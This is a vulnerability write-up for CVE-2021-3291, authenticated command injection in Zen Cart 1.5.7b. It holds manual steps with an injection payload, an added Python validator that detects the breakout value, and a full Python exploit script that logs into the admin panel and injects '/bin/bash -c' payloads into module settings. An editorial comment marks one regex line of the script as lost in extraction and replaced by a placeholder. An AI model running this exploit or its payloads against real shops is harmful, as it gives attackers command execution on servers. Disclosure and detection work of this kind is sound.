# Zen Cart 1.5.7b arbitrary command execution (CVE-2021-3291)

In Zen Cart 1.5.7b an administrator can execute arbitrary commands by inspecting an HTML radio-box element on a module edit page and inserting a command into its value.

* 1) Log in as an administrator
* 2) Open any module edit page
* 3) Inspect the element of any radio box whose value is true
* 4) Change `true` to `` true','MODULE_ORDER_TOTAL_TOTAL_STATUS'); echo `id`; // ``
* 5) Click Update
* 6) Open the edit page again to trigger the command
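
As a defender-side check added here (not part of the original post or the linked repository): a validator for the url-encoded body of a module-save request that rejects radio-box settings whose value is anything but the literal `True`/`False` and flags any value carrying the breakout shape used in step 4. The request bodies and the `..._SORT_ORDER` key below are constructed samples; only `MODULE_ORDER_TOTAL_TOTAL_STATUS` comes from the page.

```python
from urllib.parse import parse_qs
import re

# Radio-box settings on a Zen Cart module edit page only ever carry these values.
BOOLEAN_VALUES = {"True", "False"}

# Shape of the injected value from step 4: a quote closing the string followed
# by ")" and ";" ending the statement, or a backtick (shell execution in PHP).
BREAKOUT = re.compile(r"'\s*\)\s*;|`")


def check_module_save(body, boolean_keys):
    """Inspect one url-encoded module-save request body.

    boolean_keys: names of the module's radio-box (True/False) settings.
    Returns a list of (key, value, reason) tuples; an empty list means clean.
    """
    findings = []
    for key, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            if key in boolean_keys and value not in BOOLEAN_VALUES:
                findings.append((key, value, "radio-box setting is not True/False"))
            elif BREAKOUT.search(value):
                findings.append((key, value, "statement breakout or backtick in value"))
    return findings


# Constructed sample bodies, not captured traffic. The second carries the value
# from step 4, url-encoded the way a browser submits the form.
BENIGN_BODY = "MODULE_ORDER_TOTAL_TOTAL_STATUS=True&MODULE_ORDER_TOTAL_TOTAL_SORT_ORDER=1"
INJECTED_BODY = (
    "MODULE_ORDER_TOTAL_TOTAL_STATUS="
    "true%27%2C%27MODULE_ORDER_TOTAL_TOTAL_STATUS%27%29%3B+echo+%60id%60%3B+%2F%2F"
)
BOOLEAN_KEYS = {"MODULE_ORDER_TOTAL_TOTAL_STATUS"}

if __name__ == "__main__":
    for name, body in (("benign", BENIGN_BODY), ("injected", INJECTED_BODY)):
        print(name, check_module_save(body, BOOLEAN_KEYS))
```

The same allowlist belongs server-side, before the value is stored; the regex is only a second net for free-text settings.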

CVE-2021-3291 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3291

**zencart_v157b_authenticated_rce_exploit.py:**

```py
#!/usr/bin/python3
import mechanize as mc
import sys
import re
from bs4 import BeautifulSoup as bs
import base64 as B

try:
    url = sys.argv[1]
    assert url[-1] == "/"
    username = sys.argv[2]
    password = sys.argv[3]
    com = sys.argv[4]
except:
    print(f"Usage: {sys.argv[0]} http://target.com/zencart/crackXXXXX/ username password command")
    exit(1)

moduls = ["payment", "shipping", "ordertotal", "plugin_manager"]  # default module sets

br = mc.Browser()
br.set_handle_robots(False)
br.addheaders = [('User-agent', 'Chrome')]

# log in to the admin panel
br.open(url + "login.php")

br.select_form("loginForm")
br.form["admin_name"] = username
br.form["admin_pass"] = password
send = br.submit()

mod = moduls[0]
adres = url + "index.php?cmd=modules&set=" + mod
kaynak = br.open(adres).read()  # module list page source
# The next two lines were damaged when this page was extracted: the pattern passed
# to re.findall and the loop/condition header after it were lost (only the fragment
# `Edit" in kaynak:` survives). The pattern is left as a placeholder; see the
# source repository linked below for the original.
adr = re.findall(b'<PATTERN LOST IN EXTRACTION>', kaynak)
for ek in adr:
    print(f"Target url: {ek}&action=edit")
    br.open(ek + "&action=edit")
    br.select_form("modules")
    form = br.forms()[0]
    liste = b""
    for con in form.controls:
        try:
            deger = br.form.find_control(name=con.name).value
            boyut = len(deger)
            if type(deger) == list:
                if boyut == 0 or deger[0] == "True" or deger[0] == "False":
                    # radio-box (True/False) setting: replace its value with the payload
                    liste += con.name.encode() + b"=" + f"True','F'); echo `/bin/bash -c '{com}'`; //".encode() + b"&"
                    print("Payload injected")
                else:
                    liste += con.name.encode() + b"=" + deger[0].encode() + b"&"
            else:
                liste += con.name.encode() + b"=" + deger.encode() + b"&"
        except:
            pass
    print(liste[:-1])
    #br.set_proxies({"http": "localhost:5555"})
    ac = br.open(ek + "&action=save", liste[:-1])  # save the module settings
    son = br.open(ek + "&action=edit")  # reopening the edit page triggers the command
    son = br.open(ek + "&action=edit")
    son = br.open(ek + "&action=edit")
    break
```

Source: https://github.com/MucahitSaratar/zencart_auth_rce_poc
